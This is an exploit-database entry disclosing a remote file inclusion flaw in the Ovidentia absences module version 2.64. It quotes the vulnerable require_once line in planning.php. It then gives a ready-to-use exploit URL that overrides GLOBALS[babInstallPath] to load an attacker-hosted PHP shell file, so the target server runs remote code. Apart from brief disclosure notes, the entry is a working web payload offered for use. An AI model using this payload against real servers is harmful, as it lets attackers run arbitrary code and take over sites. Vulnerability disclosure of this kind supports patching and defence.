Ovidentia absences Module 2.64 - Remote File Inclusion Vulnerability

2015-12-15T00:00:00
ID 1337DAY-ID-24734
Type zdt
Reporter bd0rk
Modified 2015-12-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880
 
 
Proof-of-Concept:
 
/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------
 
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
 
---------------------------------------------------------------
 
[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?
 
 
Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
             So an attacker can use this to execute some php-shellcode for example.

#  0day.today [2018-03-02]  #